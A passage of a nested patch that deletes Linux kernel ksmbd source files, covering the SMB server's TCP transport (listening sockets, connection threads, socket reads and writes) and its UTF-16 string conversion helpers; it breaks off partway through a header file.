+- * ksmbd_tcp_new_connection() - create a new tcp session on mount
+- * @client_sk:	socket associated with new connection
+- *
+- * whenever a new connection is requested, create a conn thread
+- * (session thread) to handle new incoming smb requests from the connection
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int ksmbd_tcp_new_connection(struct socket *client_sk)
+-{
+-	struct sockaddr *csin;
+-	int rc = 0;
+-	struct tcp_transport *t;
+-
+-	t = alloc_transport(client_sk);
+-	if (!t) {
+-		sock_release(client_sk);
+-		return -ENOMEM;
+-	}
+-
+-	csin = KSMBD_TCP_PEER_SOCKADDR(KSMBD_TRANS(t)->conn);
+-	if (kernel_getpeername(client_sk, csin) < 0) {
+-		pr_err("client ip resolution failed\n");
+-		rc = -EINVAL;
+-		goto out_error;
+-	}
+-
+-	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
+-					      KSMBD_TRANS(t)->conn,
+-					      "ksmbd:%u",
+-					      ksmbd_tcp_get_port(csin));
+-	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
+-		pr_err("cannot start conn thread\n");
+-		rc = PTR_ERR(KSMBD_TRANS(t)->handler);
+-		free_transport(t);
+-	}
+-	return rc;
+-
+-out_error:
+-	free_transport(t);
+-	return rc;
+-}
+-
+-/**
+- * ksmbd_kthread_fn() - listen to new SMB connections and callback server
+- * @p:		arguments to forker thread
+- *
+- * Return:	0 on success, error number otherwise
+- */
+-static int ksmbd_kthread_fn(void *p)
+-{
+-	struct socket *client_sk = NULL;
+-	struct interface *iface = (struct interface *)p;
+-	int ret;
+-
+-	while (!kthread_should_stop()) {
+-		mutex_lock(&iface->sock_release_lock);
+-		if (!iface->ksmbd_socket) {
+-			mutex_unlock(&iface->sock_release_lock);
+-			break;
+-		}
+-		ret = kernel_accept(iface->ksmbd_socket, &client_sk,
+-				    SOCK_NONBLOCK);
+-		mutex_unlock(&iface->sock_release_lock);
+-		if (ret) {
+-			if (ret == -EAGAIN)
+-				/* check for new connections every 100 msecs */
+-				schedule_timeout_interruptible(HZ / 10);
+-			continue;
+-		}
+-
+-		if (server_conf.max_connections &&
+-		    atomic_inc_return(&active_num_conn) >= server_conf.max_connections) {
+-			pr_info_ratelimited("Limit the maximum number of connections(%u)\n",
+-					    atomic_read(&active_num_conn));
+-			atomic_dec(&active_num_conn);
+-			sock_release(client_sk);
+-			continue;
+-		}
+-
+-		ksmbd_debug(CONN, "connect success: accepted new connection\n");
+-		client_sk->sk->sk_rcvtimeo = KSMBD_TCP_RECV_TIMEOUT;
+-		client_sk->sk->sk_sndtimeo = KSMBD_TCP_SEND_TIMEOUT;
+-
+-		ksmbd_tcp_new_connection(client_sk);
+-	}
+-
+-	ksmbd_debug(CONN, "releasing socket\n");
+-	return 0;
+-}
+-
+-/**
+- * ksmbd_tcp_run_kthread() - start forker thread
+- * @iface: pointer to struct interface
+- *
+- * start forker thread(ksmbd/0) at module init time to listen
+- * on port 445 for new SMB connection requests. It creates per connection
+- * server threads(ksmbd/x)
+- *
+- * Return:	0 on success or error number
+- */
+-static int ksmbd_tcp_run_kthread(struct interface *iface)
+-{
+-	int rc;
+-	struct task_struct *kthread;
+-
+-	kthread = kthread_run(ksmbd_kthread_fn, (void *)iface, "ksmbd-%s",
+-			      iface->name);
+-	if (IS_ERR(kthread)) {
+-		rc = PTR_ERR(kthread);
+-		return rc;
+-	}
+-	iface->ksmbd_kthread = kthread;
+-
+-	return 0;
+-}
+-
+-/**
+- * ksmbd_tcp_readv() - read data from socket in given iovec
+- * @t:			TCP transport instance
+- * @iov_orig:		base IO vector
+- * @nr_segs:		number of segments in base iov
+- * @to_read:		number of bytes to read from socket
+- * @max_retries:	maximum retry count
+- *
+- * Return:	on success return number of bytes read from socket,
+- *		otherwise return error number
+- */
+-static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+-			   unsigned int nr_segs, unsigned int to_read,
+-			   int max_retries)
+-{
+-	int length = 0;
+-	int total_read;
+-	unsigned int segs;
+-	struct msghdr ksmbd_msg;
+-	struct kvec *iov;
+-	struct ksmbd_conn *conn = KSMBD_TRANS(t)->conn;
+-
+-	iov = get_conn_iovec(t, nr_segs);
+-	if (!iov)
+-		return -ENOMEM;
+-
+-	ksmbd_msg.msg_control = NULL;
+-	ksmbd_msg.msg_controllen = 0;
+-
+-	for (total_read = 0; to_read; total_read += length, to_read -= length) {
+-		try_to_freeze();
+-
+-		if (!ksmbd_conn_alive(conn)) {
+-			total_read = -ESHUTDOWN;
+-			break;
+-		}
+-		segs = kvec_array_init(iov, iov_orig, nr_segs, total_read);
+-
+-		length = kernel_recvmsg(t->sock, &ksmbd_msg,
+-					iov, segs, to_read, 0);
+-
+-		if (length == -EINTR) {
+-			total_read = -ESHUTDOWN;
+-			break;
+-		} else if (ksmbd_conn_need_reconnect(conn)) {
+-			total_read = -EAGAIN;
+-			break;
+-		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
+-			/*
+-			 * If max_retries is negative, Allow unlimited
+-			 * retries to keep connection with inactive sessions.
+-			 */
+-			if (max_retries == 0) {
+-				total_read = length;
+-				break;
+-			} else if (max_retries > 0) {
+-				max_retries--;
+-			}
+-
+-			usleep_range(1000, 2000);
+-			length = 0;
+-			continue;
+-		} else if (length <= 0) {
+-			total_read = length;
+-			break;
+-		}
+-	}
+-	return total_read;
+-}
+-
+-/**
+- * ksmbd_tcp_read() - read data from socket in given buffer
+- * @t:		TCP transport instance
+- * @buf:	buffer to store read data from socket
+- * @to_read:	number of bytes to read from socket
+- *
+- * Return:	on success return number of bytes read from socket,
+- *		otherwise return error number
+- */
+-static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf,
+-			  unsigned int to_read, int max_retries)
+-{
+-	struct kvec iov;
+-
+-	iov.iov_base = buf;
+-	iov.iov_len = to_read;
+-
+-	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read, max_retries);
+-}
+-
+-static int ksmbd_tcp_writev(struct ksmbd_transport *t, struct kvec *iov,
+-			    int nvecs, int size, bool need_invalidate,
+-			    unsigned int remote_key)
+-
+-{
+-	struct msghdr smb_msg = {.msg_flags = MSG_NOSIGNAL};
+-
+-	return kernel_sendmsg(TCP_TRANS(t)->sock, &smb_msg, iov, nvecs, size);
+-}
+-
+-static void ksmbd_tcp_disconnect(struct ksmbd_transport *t)
+-{
+-	free_transport(TCP_TRANS(t));
+-	if (server_conf.max_connections)
+-		atomic_dec(&active_num_conn);
+-}
+-
+-static void tcp_destroy_socket(struct socket *ksmbd_socket)
+-{
+-	int ret;
+-
+-	if (!ksmbd_socket)
+-		return;
+-
+-	/* set zero to timeout */
+-	ksmbd_tcp_rcv_timeout(ksmbd_socket, 0);
+-	ksmbd_tcp_snd_timeout(ksmbd_socket, 0);
+-
+-	ret = kernel_sock_shutdown(ksmbd_socket, SHUT_RDWR);
+-	if (ret)
+-		pr_err("Failed to shutdown socket: %d\n", ret);
+-	sock_release(ksmbd_socket);
+-}
+-
+-/**
+- * create_socket - create socket for ksmbd/0
+- *
+- * Return:	0 on success, error number otherwise
+- */
+-static int create_socket(struct interface *iface)
+-{
+-	int ret;
+-	struct sockaddr_in6 sin6;
+-	struct sockaddr_in sin;
+-	struct socket *ksmbd_socket;
+-	bool ipv4 = false;
+-
+-	ret = sock_create(PF_INET6, SOCK_STREAM, IPPROTO_TCP, &ksmbd_socket);
+-	if (ret) {
+-		if (ret != -EAFNOSUPPORT)
+-			pr_err("Can't create socket for ipv6, fallback to ipv4: %d\n", ret);
+-		ret = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,
+-				  &ksmbd_socket);
+-		if (ret) {
+-			pr_err("Can't create socket for ipv4: %d\n", ret);
+-			goto out_clear;
+-		}
+-
+-		sin.sin_family = PF_INET;
+-		sin.sin_addr.s_addr = htonl(INADDR_ANY);
+-		sin.sin_port = htons(server_conf.tcp_port);
+-		ipv4 = true;
+-	} else {
+-		sin6.sin6_family = PF_INET6;
+-		sin6.sin6_addr = in6addr_any;
+-		sin6.sin6_port = htons(server_conf.tcp_port);
+-	}
+-
+-	ksmbd_tcp_nodelay(ksmbd_socket);
+-	ksmbd_tcp_reuseaddr(ksmbd_socket);
+-
+-	ret = sock_setsockopt(ksmbd_socket,
+-			      SOL_SOCKET,
+-			      SO_BINDTODEVICE,
+-			      KERNEL_SOCKPTR(iface->name),
+-			      strlen(iface->name));
+-	if (ret != -ENODEV && ret < 0) {
+-		pr_err("Failed to set SO_BINDTODEVICE: %d\n", ret);
+-		goto out_error;
+-	}
+-
+-	if (ipv4)
+-		ret = kernel_bind(ksmbd_socket, (struct sockaddr *)&sin,
+-				  sizeof(sin));
+-	else
+-		ret = kernel_bind(ksmbd_socket, (struct sockaddr *)&sin6,
+-				  sizeof(sin6));
+-	if (ret) {
+-		pr_err("Failed to bind socket: %d\n", ret);
+-		goto out_error;
+-	}
+-
+-	ksmbd_socket->sk->sk_rcvtimeo = KSMBD_TCP_RECV_TIMEOUT;
+-	ksmbd_socket->sk->sk_sndtimeo = KSMBD_TCP_SEND_TIMEOUT;
+-
+-	ret = kernel_listen(ksmbd_socket, KSMBD_SOCKET_BACKLOG);
+-	if (ret) {
+-		pr_err("Port listen() error: %d\n", ret);
+-		goto out_error;
+-	}
+-
+-	iface->ksmbd_socket = ksmbd_socket;
+-	ret = ksmbd_tcp_run_kthread(iface);
+-	if (ret) {
+-		pr_err("Can't start ksmbd main kthread: %d\n", ret);
+-		goto out_error;
+-	}
+-	iface->state = IFACE_STATE_CONFIGURED;
+-
+-	return 0;
+-
+-out_error:
+-	tcp_destroy_socket(ksmbd_socket);
+-out_clear:
+-	iface->ksmbd_socket = NULL;
+-	return ret;
+-}
+-
+-static int ksmbd_netdev_event(struct notifier_block *nb, unsigned long event,
+-			      void *ptr)
+-{
+-	struct net_device *netdev = netdev_notifier_info_to_dev(ptr);
+-	struct interface *iface;
+-	int ret, found = 0;
+-
+-	switch (event) {
+-	case NETDEV_UP:
+-		if (netif_is_bridge_port(netdev))
+-			return NOTIFY_OK;
+-
+-		list_for_each_entry(iface, &iface_list, entry) {
+-			if (!strcmp(iface->name, netdev->name)) {
+-				found = 1;
+-				if (iface->state != IFACE_STATE_DOWN)
+-					break;
+-				ret = create_socket(iface);
+-				if (ret)
+-					return NOTIFY_OK;
+-				break;
+-			}
+-		}
+-		if (!found && bind_additional_ifaces) {
+-			iface = alloc_iface(kstrdup(netdev->name, GFP_KERNEL));
+-			if (!iface)
+-				return NOTIFY_OK;
+-			ret = create_socket(iface);
+-			if (ret)
+-				break;
+-		}
+-		break;
+-	case NETDEV_DOWN:
+-		list_for_each_entry(iface, &iface_list, entry) {
+-			if (!strcmp(iface->name, netdev->name) &&
+-			    iface->state == IFACE_STATE_CONFIGURED) {
+-				tcp_stop_kthread(iface->ksmbd_kthread);
+-				iface->ksmbd_kthread = NULL;
+-				mutex_lock(&iface->sock_release_lock);
+-				tcp_destroy_socket(iface->ksmbd_socket);
+-				iface->ksmbd_socket = NULL;
+-				mutex_unlock(&iface->sock_release_lock);
+-
+-				iface->state = IFACE_STATE_DOWN;
+-				break;
+-			}
+-		}
+-		break;
+-	}
+-
+-	return NOTIFY_DONE;
+-}
+-
+-static struct notifier_block ksmbd_netdev_notifier = {
+-	.notifier_call = ksmbd_netdev_event,
+-};
+-
+-int ksmbd_tcp_init(void)
+-{
+-	register_netdevice_notifier(&ksmbd_netdev_notifier);
+-
+-	return 0;
+-}
+-
+-static void tcp_stop_kthread(struct task_struct *kthread)
+-{
+-	int ret;
+-
+-	if (!kthread)
+-		return;
+-
+-	ret = kthread_stop(kthread);
+-	if (ret)
+-		pr_err("failed to stop forker thread\n");
+-}
+-
+-void ksmbd_tcp_destroy(void)
+-{
+-	struct interface *iface, *tmp;
+-
+-	unregister_netdevice_notifier(&ksmbd_netdev_notifier);
+-
+-	list_for_each_entry_safe(iface, tmp, &iface_list, entry) {
+-		list_del(&iface->entry);
+-		kfree(iface->name);
+-		kfree(iface);
+-	}
+-}
+-
+-static struct interface *alloc_iface(char *ifname)
+-{
+-	struct interface *iface;
+-
+-	if (!ifname)
+-		return NULL;
+-
+-	iface = kzalloc(sizeof(struct interface), GFP_KERNEL);
+-	if (!iface) {
+-		kfree(ifname);
+-		return NULL;
+-	}
+-
+-	iface->name = ifname;
+-	iface->state = IFACE_STATE_DOWN;
+-	list_add(&iface->entry, &iface_list);
+-	mutex_init(&iface->sock_release_lock);
+-	return iface;
+-}
+-
+-int ksmbd_tcp_set_interfaces(char *ifc_list, int ifc_list_sz)
+-{
+-	int sz = 0;
+-
+-	if (!ifc_list_sz) {
+-		struct net_device *netdev;
+-
+-		rtnl_lock();
+-		for_each_netdev(&init_net, netdev) {
+-			if (netif_is_bridge_port(netdev))
+-				continue;
+-			if (!alloc_iface(kstrdup(netdev->name, GFP_KERNEL)))
+-				return -ENOMEM;
+-		}
+-		rtnl_unlock();
+-		bind_additional_ifaces = 1;
+-		return 0;
+-	}
+-
+-	while (ifc_list_sz > 0) {
+-		if (!alloc_iface(kstrdup(ifc_list, GFP_KERNEL)))
+-			return -ENOMEM;
+-
+-		sz = strlen(ifc_list);
+-		if (!sz)
+-			break;
+-
+-		ifc_list += sz + 1;
+-		ifc_list_sz -= (sz + 1);
+-	}
+-
+-	bind_additional_ifaces = 0;
+-
+-	return 0;
+-}
+-
+-static struct ksmbd_transport_ops ksmbd_tcp_transport_ops = {
+-	.read		= ksmbd_tcp_read,
+-	.writev		= ksmbd_tcp_writev,
+-	.disconnect	= ksmbd_tcp_disconnect,
+-};
+diff --git a/fs/ksmbd/transport_tcp.h b/fs/ksmbd/transport_tcp.h
+deleted file mode 100644
+index e338bebe322f1..0000000000000
+--- a/fs/ksmbd/transport_tcp.h
++++ /dev/null
+@@ -1,13 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_TRANSPORT_TCP_H__
+-#define __KSMBD_TRANSPORT_TCP_H__
+-
+-int ksmbd_tcp_set_interfaces(char *ifc_list, int ifc_list_sz);
+-int ksmbd_tcp_init(void);
+-void ksmbd_tcp_destroy(void);
+-
+-#endif /* __KSMBD_TRANSPORT_TCP_H__ */
+diff --git a/fs/ksmbd/unicode.c b/fs/ksmbd/unicode.c
+deleted file mode 100644
+index a0db699ddafda..0000000000000
+--- a/fs/ksmbd/unicode.c
++++ /dev/null
+@@ -1,384 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Some of the source code in this file came from fs/cifs/cifs_unicode.c
+- *
+- *   Copyright (c) International Business Machines  Corp., 2000,2009
+- *   Modified by Steve French (sfrench@us.ibm.com)
+- *   Modified by Namjae Jeon (linkinjeon@kernel.org)
+- */
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include <asm/unaligned.h>
+-#include "glob.h"
+-#include "unicode.h"
+-#include "uniupr.h"
+-#include "smb_common.h"
+-
+-/*
+- * smb_utf16_bytes() - how long will a string be after conversion?
+- * @from:	pointer to input string
+- * @maxbytes:	don't go past this many bytes of input string
+- * @codepage:	destination codepage
+- *
+- * Walk a utf16le string and return the number of bytes that the string will
+- * be after being converted to the given charset, not including any null
+- * termination required. Don't walk past maxbytes in the source buffer.
+- *
+- * Return:	string length after conversion
+- */
+-static int smb_utf16_bytes(const __le16 *from, int maxbytes,
+-			   const struct nls_table *codepage)
+-{
+-	int i;
+-	int charlen, outlen = 0;
+-	int maxwords = maxbytes / 2;
+-	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp;
+-
+-	for (i = 0; i < maxwords; i++) {
+-		ftmp = get_unaligned_le16(&from[i]);
+-		if (ftmp == 0)
+-			break;
+-
+-		charlen = codepage->uni2char(ftmp, tmp, NLS_MAX_CHARSET_SIZE);
+-		if (charlen > 0)
+-			outlen += charlen;
+-		else
+-			outlen++;
+-	}
+-
+-	return outlen;
+-}
+-
+-/*
+- * cifs_mapchar() - convert a host-endian char to proper char in codepage
+- * @target:	where converted character should be copied
+- * @src_char:	2 byte host-endian source character
+- * @cp:		codepage to which character should be converted
+- * @mapchar:	should character be mapped according to mapchars mount option?
+- *
+- * This function handles the conversion of a single character. It is the
+- * responsibility of the caller to ensure that the target buffer is large
+- * enough to hold the result of the conversion (at least NLS_MAX_CHARSET_SIZE).
+- *
+- * Return:	string length after conversion
+- */
+-static int
+-cifs_mapchar(char *target, const __u16 src_char, const struct nls_table *cp,
+-	     bool mapchar)
+-{
+-	int len = 1;
+-
+-	if (!mapchar)
+-		goto cp_convert;
+-
+-	/*
+-	 * BB: Cannot handle remapping UNI_SLASH until all the calls to
+-	 *     build_path_from_dentry are modified, as they use slash as
+-	 *     separator.
+-	 */
+-	switch (src_char) {
+-	case UNI_COLON:
+-		*target = ':';
+-		break;
+-	case UNI_ASTERISK:
+-		*target = '*';
+-		break;
+-	case UNI_QUESTION:
+-		*target = '?';
+-		break;
+-	case UNI_PIPE:
+-		*target = '|';
+-		break;
+-	case UNI_GRTRTHAN:
+-		*target = '>';
+-		break;
+-	case UNI_LESSTHAN:
+-		*target = '<';
+-		break;
+-	default:
+-		goto cp_convert;
+-	}
+-
+-out:
+-	return len;
+-
+-cp_convert:
+-	len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE);
+-	if (len <= 0) {
+-		*target = '?';
+-		len = 1;
+-	}
+-
+-	goto out;
+-}
+-
+-/*
+- * is_char_allowed() - check for valid character
+- * @ch:		input character to be checked
+- *
+- * Return:	1 if char is allowed, otherwise 0
+- */
+-static inline int is_char_allowed(char *ch)
+-{
+-	/* check for control chars, wildcards etc. */
+-	if (!(*ch & 0x80) &&
+-	    (*ch <= 0x1f ||
+-	     *ch == '?' || *ch == '"' || *ch == '<' ||
+-	     *ch == '>' || *ch == '|'))
+-		return 0;
+-
+-	return 1;
+-}
+-
+-/*
+- * smb_from_utf16() - convert utf16le string to local charset
+- * @to:		destination buffer
+- * @from:	source buffer
+- * @tolen:	destination buffer size (in bytes)
+- * @fromlen:	source buffer size (in bytes)
+- * @codepage:	codepage to which characters should be converted
+- * @mapchar:	should characters be remapped according to the mapchars option?
+- *
+- * Convert a little-endian utf16le string (as sent by the server) to a string
+- * in the provided codepage. The tolen and fromlen parameters are to ensure
+- * that the code doesn't walk off of the end of the buffer (which is always
+- * a danger if the alignment of the source buffer is off). The destination
+- * string is always properly null terminated and fits in the destination
+- * buffer. Returns the length of the destination string in bytes (including
+- * null terminator).
+- *
+- * Note that some windows versions actually send multiword UTF-16 characters
+- * instead of straight UTF16-2. The linux nls routines however aren't able to
+- * deal with those characters properly. In the event that we get some of
+- * those characters, they won't be translated properly.
+- *
+- * Return:	string length after conversion
+- */
+-static int smb_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+-			  const struct nls_table *codepage, bool mapchar)
+-{
+-	int i, charlen, safelen;
+-	int outlen = 0;
+-	int nullsize = nls_nullsize(codepage);
+-	int fromwords = fromlen / 2;
+-	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp;
+-
+-	/*
+-	 * because the chars can be of varying widths, we need to take care
+-	 * not to overflow the destination buffer when we get close to the
+-	 * end of it. Until we get to this offset, we don't need to check
+-	 * for overflow however.
+-	 */
+-	safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize);
+-
+-	for (i = 0; i < fromwords; i++) {
+-		ftmp = get_unaligned_le16(&from[i]);
+-		if (ftmp == 0)
+-			break;
+-
+-		/*
+-		 * check to see if converting this character might make the
+-		 * conversion bleed into the null terminator
+-		 */
+-		if (outlen >= safelen) {
+-			charlen = cifs_mapchar(tmp, ftmp, codepage, mapchar);
+-			if ((outlen + charlen) > (tolen - nullsize))
+-				break;
+-		}
+-
+-		/* put converted char into 'to' buffer */
+-		charlen = cifs_mapchar(&to[outlen], ftmp, codepage, mapchar);
+-		outlen += charlen;
+-	}
+-
+-	/* properly null-terminate string */
+-	for (i = 0; i < nullsize; i++)
+-		to[outlen++] = 0;
+-
+-	return outlen;
+-}
+-
+-/*
+- * smb_strtoUTF16() - Convert character string to unicode string
+- * @to:		destination buffer
+- * @from:	source buffer
+- * @len:	destination buffer size (in bytes)
+- * @codepage:	codepage to which characters should be converted
+- *
+- * Return:	string length after conversion
+- */
+-int smb_strtoUTF16(__le16 *to, const char *from, int len,
+-		   const struct nls_table *codepage)
+-{
+-	int charlen;
+-	int i;
+-	wchar_t wchar_to; /* needed to quiet sparse */
+-
+-	/* special case for utf8 to handle no plane0 chars */
+-	if (!strcmp(codepage->charset, "utf8")) {
+-		/*
+-		 * convert utf8 -> utf16, we assume we have enough space
+-		 * as caller should have assumed conversion does not overflow
+-		 * in destination len is length in wchar_t units (16bits)
+-		 */
+-		i  = utf8s_to_utf16s(from, len, UTF16_LITTLE_ENDIAN,
+-				     (wchar_t *)to, len);
+-
+-		/* if success terminate and exit */
+-		if (i >= 0)
+-			goto success;
+-		/*
+-		 * if fails fall back to UCS encoding as this
+-		 * function should not return negative values
+-		 * currently can fail only if source contains
+-		 * invalid encoded characters
+-		 */
+-	}
+-
+-	for (i = 0; len > 0 && *from; i++, from += charlen, len -= charlen) {
+-		charlen = codepage->char2uni(from, len, &wchar_to);
+-		if (charlen < 1) {
+-			/* A question mark */
+-			wchar_to = 0x003f;
+-			charlen = 1;
+-		}
+-		put_unaligned_le16(wchar_to, &to[i]);
+-	}
+-
+-success:
+-	put_unaligned_le16(0, &to[i]);
+-	return i;
+-}
+-
+-/*
+- * smb_strndup_from_utf16() - copy a string from wire format to the local
+- *		codepage
+- * @src:	source string
+- * @maxlen:	don't walk past this many bytes in the source string
+- * @is_unicode:	is this a unicode string?
+- * @codepage:	destination codepage
+- *
+- * Take a string given by the server, convert it to the local codepage and
+- * put it in a new buffer. Returns a pointer to the new string or NULL on
+- * error.
+- *
+- * Return:	destination string buffer or error ptr
+- */
+-char *smb_strndup_from_utf16(const char *src, const int maxlen,
+-			     const bool is_unicode,
+-			     const struct nls_table *codepage)
+-{
+-	int len, ret;
+-	char *dst;
+-
+-	if (is_unicode) {
+-		len = smb_utf16_bytes((__le16 *)src, maxlen, codepage);
+-		len += nls_nullsize(codepage);
+-		dst = kmalloc(len, GFP_KERNEL);
+-		if (!dst)
+-			return ERR_PTR(-ENOMEM);
+-		ret = smb_from_utf16(dst, (__le16 *)src, len, maxlen, codepage,
+-				     false);
+-		if (ret < 0) {
+-			kfree(dst);
+-			return ERR_PTR(-EINVAL);
+-		}
+-	} else {
+-		len = strnlen(src, maxlen);
+-		len++;
+-		dst = kmalloc(len, GFP_KERNEL);
+-		if (!dst)
+-			return ERR_PTR(-ENOMEM);
+-		strscpy(dst, src, len);
+-	}
+-
+-	return dst;
+-}
+-
+-/*
+- * Convert 16 bit Unicode pathname to wire format from string in current code
+- * page. Conversion may involve remapping up the six characters that are
+- * only legal in POSIX-like OS (if they are present in the string). Path
+- * names are little endian 16 bit Unicode on the wire
+- */
+-/*
+- * smbConvertToUTF16() - convert string from local charset to utf16
+- * @target:	destination buffer
+- * @source:	source buffer
+- * @srclen:	source buffer size (in bytes)
+- * @cp:		codepage to which characters should be converted
+- * @mapchar:	should characters be remapped according to the mapchars option?
+- *
+- * Convert 16 bit Unicode pathname to wire format from string in current code
+- * page. Conversion may involve remapping up the six characters that are
+- * only legal in POSIX-like OS (if they are present in the string). Path
+- * names are little endian 16 bit Unicode on the wire
+- *
+- * Return:	char length after conversion
+- */
+-int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
+-		      const struct nls_table *cp, int mapchars)
+-{
+-	int i, j, charlen;
+-	char src_char;
+-	__le16 dst_char;
+-	wchar_t tmp;
+-
+-	if (!mapchars)
+-		return smb_strtoUTF16(target, source, srclen, cp);
+-
+-	for (i = 0, j = 0; i < srclen; j++) {
+-		src_char = source[i];
+-		charlen = 1;
+-		switch (src_char) {
+-		case 0:
+-			put_unaligned(0, &target[j]);
+-			return j;
+-		case ':':
+-			dst_char = cpu_to_le16(UNI_COLON);
+-			break;
+-		case '*':
+-			dst_char = cpu_to_le16(UNI_ASTERISK);
+-			break;
+-		case '?':
+-			dst_char = cpu_to_le16(UNI_QUESTION);
+-			break;
+-		case '<':
+-			dst_char = cpu_to_le16(UNI_LESSTHAN);
+-			break;
+-		case '>':
+-			dst_char = cpu_to_le16(UNI_GRTRTHAN);
+-			break;
+-		case '|':
+-			dst_char = cpu_to_le16(UNI_PIPE);
+-			break;
+-		/*
+-		 * FIXME: We can not handle remapping backslash (UNI_SLASH)
+-		 * until all the calls to build_path_from_dentry are modified,
+-		 * as they use backslash as separator.
+-		 */
+-		default:
+-			charlen = cp->char2uni(source + i, srclen - i, &tmp);
+-			dst_char = cpu_to_le16(tmp);
+-
+-			/*
+-			 * if no match, use question mark, which at least in
+-			 * some cases serves as wild card
+-			 */
+-			if (charlen < 1) {
+-				dst_char = cpu_to_le16(0x003f);
+-				charlen = 1;
+-			}
+-		}
+-		/*
+-		 * character may take more than one byte in the source string,
+-		 * but will take exactly two bytes in the target string
+-		 */
+-		i += charlen;
+-		put_unaligned(dst_char, &target[j]);
+-	}
+-
+-	return j;
+-}
+diff --git a/fs/ksmbd/unicode.h b/fs/ksmbd/unicode.h
+deleted file mode 100644
+index 076f6034a7899..0000000000000
+--- a/fs/ksmbd/unicode.h
++++ /dev/null
+@@ -1,358 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- * Some of the source code in this file came from fs/cifs/cifs_unicode.c
+- * cifs_unicode:  Unicode kernel case support
+- *
+- * Function:
+- *     Convert a unicode character to upper or lower case using
+- *     compressed tables.
+- *
+- *   Copyright (c) International Business Machines  Corp., 2000,2009
+- *
+- *
+- * Notes:
+- *     These APIs are based on the C library functions.  The semantics
+- *     should match the C functions but with expanded size operands.
+- *
+- *     The upper/lower functions are based on a table created by mkupr.
+- *     This is a compressed table of upper and lower case conversion.
+- *
+- */
+-#ifndef _CIFS_UNICODE_H
+-#define _CIFS_UNICODE_H
+-
+-#include <asm/byteorder.h>
+-#include <linux/types.h>
+-#include <linux/nls.h>
+-#include <linux/unicode.h>
+-
+-#define  UNIUPR_NOLOWER		/* Example to not expand lower case tables */
+-
+-/*
+- * Windows maps these to the user defined 16 bit Unicode range since they are
+- * reserved symbols (along with \ and /), otherwise illegal to store
+- * in filenames in NTFS
+- */
+-#define UNI_ASTERISK    ((__u16)('*' + 0xF000))
+-#define UNI_QUESTION    ((__u16)('?' + 0xF000))
+-#define UNI_COLON       ((__u16)(':' + 0xF000))
+-#define UNI_GRTRTHAN    ((__u16)('>' + 0xF000))
+-#define UNI_LESSTHAN    ((__u16)('<' + 0xF000))
+-#define UNI_PIPE        ((__u16)('|' + 0xF000))
+-#define UNI_SLASH       ((__u16)('\\' + 0xF000))
+-
+-/* Just define what we want from uniupr.h.  We don't want to define the tables
+- * in each source file.
+- */
+-#ifndef	UNICASERANGE_DEFINED
+-struct UniCaseRange {
+-	wchar_t start;
+-	wchar_t end;
+-	signed char *table;
+-};
+-#endif				/* UNICASERANGE_DEFINED */
+-
+-#ifndef UNIUPR_NOUPPER
+-extern signed char SmbUniUpperTable[512];
+-extern const struct UniCaseRange SmbUniUpperRange[];
+-#endif				/* UNIUPR_NOUPPER */
+-
+-#ifndef UNIUPR_NOLOWER
+-extern signed char CifsUniLowerTable[512];
+-extern const struct UniCaseRange CifsUniLowerRange[];
+-#endif				/* UNIUPR_NOLOWER */
+-
+-#ifdef __KERNEL__
+-int smb_strtoUTF16(__le16 *to, const char *from, int len,
+-		   const struct nls_table *codepage);
+-char *smb_strndup_from_utf16(const char *src, const int maxlen,
+-			     const bool is_unicode,
+-			     const struct nls_table *codepage);
+-int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
+-		      const struct nls_table *cp, int mapchars);
+-char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename);
+-#endif
+-
+-/*
+- * UniStrcat:  Concatenate the second string to the first
+- *
+- * Returns:
+- *     Address of the first string
+- */
+-static inline wchar_t *UniStrcat(wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	wchar_t *anchor = ucs1;	/* save a pointer to start of ucs1 */
+-
+-	while (*ucs1++)
+-	/*NULL*/;	/* To end of first string */
+-	ucs1--;			/* Return to the null */
+-	while ((*ucs1++ = *ucs2++))
+-	/*NULL*/;	/* copy string 2 over */
+-	return anchor;
+-}
+-
+-/*
+- * UniStrchr:  Find a character in a string
+- *
+- * Returns:
+- *     Address of first occurrence of character in string
+- *     or NULL if the character is not in the string
+- */
+-static inline wchar_t *UniStrchr(const wchar_t *ucs, wchar_t uc)
+-{
+-	while ((*ucs != uc) && *ucs)
+-		ucs++;
+-
+-	if (*ucs == uc)
+-		return (wchar_t *)ucs;
+-	return NULL;
+-}
+-
+-/*
+- * UniStrcmp:  Compare two strings
+- *
+- * Returns:
+- *     < 0:  First string is less than second
+- *     = 0:  Strings are equal
+- *     > 0:  First string is greater than second
+- */
+-static inline int UniStrcmp(const wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	while ((*ucs1 == *ucs2) && *ucs1) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int)*ucs1 - (int)*ucs2;
+-}
+-
+-/*
+- * UniStrcpy:  Copy a string
+- */
+-static inline wchar_t *UniStrcpy(wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	wchar_t *anchor = ucs1;	/* save the start of result string */
+-
+-	while ((*ucs1++ = *ucs2++))
+-	/*NULL*/;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrlen:  Return the length of a string (in 16 bit Unicode chars not bytes)
+- */
+-static inline size_t UniStrlen(const wchar_t *ucs1)
+-{
